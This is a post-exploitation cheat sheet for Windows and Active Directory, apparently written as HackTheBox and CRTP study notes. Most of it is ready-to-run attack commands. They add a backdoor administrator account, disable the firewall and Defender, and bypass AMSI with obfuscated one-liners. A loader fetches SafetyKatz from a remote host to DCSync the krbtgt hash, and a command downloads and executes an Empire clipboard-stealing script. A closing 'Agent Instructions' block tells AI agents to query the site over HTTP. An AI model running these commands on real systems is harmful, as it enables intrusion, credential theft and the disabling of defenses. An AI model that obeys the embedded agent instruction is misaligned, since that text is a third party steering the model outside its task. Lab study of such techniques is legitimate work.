# Post Exploitation

## RDP Stuff

### Add Local Administrator

Create user **asuka** and add to RDP, Admin, and WinRM.

{% code overflow="wrap" %}

```powershell
net user asuka 'TrYh@rdeR!' /add
net localgroup "Remote Desktop Users" asuka /add
net localgroup "Administrators" asuka /add
net localgroup "Remote Management Users" asuka /add
```

{% endcode %}

### Enable RDP Access

{% code overflow="wrap" %}

```powershell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -
name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# In case powershell is not enabled (like in old machine)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
```

{% endcode %}

### Access RDP

{% code overflow="wrap" %}

```bash
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/
rdesktop support.htb

# fix ERRCONNECT_TLS_CONNECT_FAILED
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb /u:asuka /p:'TrYh@rdeR!' +nego /drive:Tools,/home/asuka/Tools/ActiveDirectory/ /tls-seclevel:0
```

{% endcode %}

## Defender and Firewall Stuff

### Turn Off Firewall

{% code overflow="wrap" %}

```powershell
# powershell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
# cmd
netsh advfirewall set allprofiles state off
```

{% endcode %}

### Disable Defender Real Time Monitoring

{% code overflow="wrap" %}

```powershell
# Remove Defender Database
cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Get-MpComputerStatus
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -ExclusionExtension "ps1"
Set-MPPreference -DisableBehaviorMonitoring $true

# Disable AMSI (set to 0 to enable)
Set-MpPreference -DisableScriptScanning 1 

# Check all exclusion folder
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
# Add folder exclusion (in case tamper protection is enabled)
Add-MpPreference -ExclusionPath C:\Mimikatz\

# Disable Real Time Protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
```

{% endcode %}

### Bypassing PowerShell Security

Using InviShell - <https://github.com/OmerYa/Invisi-Shell>

{% code overflow="wrap" %}

```
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
```

{% endcode %}

### AMSI Bypass

Detection: <https://github.com/RythmStick/AMSITrigger>

{% tabs %}
{% tab title="2023" %}
{% code overflow="wrap" %}

```powershell
$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)
```

{% endcode %}
{% endtab %}

{% tab title="CRTP" %}
{% code overflow="wrap" %}

```powershell
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

{% endcode %}
{% endtab %}

{% tab title="Base64" %}
{% code overflow="wrap" %}

```powershell
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
```

{% endcode %}
{% endtab %}
{% endtabs %}

### OPSEC with Loader

{% code overflow="wrap" %}

```powershell
C:\AD\Tools\Loader.exe -path http://172.16.100.67/SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```

{% endcode %}

### Get-ClipboardContents

Monitors the clipboard on a specified interval for changes to copied text.

{% code overflow="wrap" %}

```powershell
iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents
```

{% endcode %}

### WADComs

WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.

* <https://wadcoms.github.io/>

### Dump Saved Password

* [BrowserStealer](https://github.com/SaulBerrenson/BrowserStealer)
* [LaZagne](https://github.com/AlessandroZ/LaZagne)
* Mimikatz

### TCP Port Scanner

{% code overflow="wrap" %}

```powershell
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("172.16.8.1",$_)) "Port $_ is open!"} 2>$null # powershell
```

{% endcode %}

### Ping Sweep

{% code overflow="wrap" %}

```powershell
for /l %i in (1,1,254) do @ping -n 1 -w 100 172.16.8.%i > nul && echo 172.16.8.%i is up. # cmd
```

{% endcode %}

### Inveigh

Responder, but in Powershell/C#

* <https://github.com/Kevin-Robertson/Inveigh>

### MDE Enum

How to extract Windows Defender Exclusions and Attack Surface Reduction (ASR) rules without Admin privileges

* <https://github.com/0xsp-SRD/MDE_Enum>

{% code overflow="wrap" %}

```bash
# local
mde-enum.exe /local /paths /access
# remote
mde-enum.exe <ip> <username> <password> <domain> /paths
# i.e
.\mde-enum.exe 172.16.8.148 asuka Asuka@1337 child.zerobyte.lab /paths
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-s8CjvYH04yAIm9dffLa8xRTnARSQR9gd8WKp6fZxTrQEMkCc-NAlewZB_1H5nAQzO4zxKf1FUQTfKLGKoTfTSIs6L3FmkbbMoXZggddyNVk5SlYwrqshBUKujEWox-CIOs25DspgkCVe9FQwcN8owuUqLZfh1JMlr0b3qawe1JMJMkyYbO_58cnPRX8/s872/mde-enum.png" alt=""><figcaption><p>MDE Enum</p></figcaption></figure>

Or, use this Powershell script.

```powershell
$logName = "Microsoft-Windows-Windows Defender/Operational"
$eventID = 5007
$events = Get-WinEvent -LogName $logName | Where-Object { $_.Id -eq $eventID }
$exclusionEvents = $events | Where-Object { $_.Message -match "Exclusions" }
$pattern = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\[^\s]+"
$exclusionEvents | ForEach-Object {
    if ($_.Message -match $pattern) {
        $matches[0]
    }
}
```

<figure><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizy7s-PGsq5vpXfy6QMsH7TTl3qm5lWLyL8oNYRVVa3vIjHK4EAg3gKIszCqdCjjm-LRAGNGmfpWkBvpRAg8MwWaL2J-2XKo6HdmwJpynygsbkUXmyg0M3ikgGyt5Hq1gga3GQA04CDqoMqRW6NZuFWP-D2rTnHrIrZNuszuphAH56xwx2x1XJtpGkaBw/s742/mde-enum-powershell.png" alt=""><figcaption><p>Enumerate Defender Exclusions</p></figcaption></figure>

Reference:

* <https://x.com/VakninHai/status/1796628601535652289>

### Other Useful Stuff

* <https://github.com/r3motecontrol/Ghostpack-CompiledBinaries>
* <https://github.com/Flangvik/SharpCollection>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://htb.linuxsec.org/active-directory/post-exploitation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.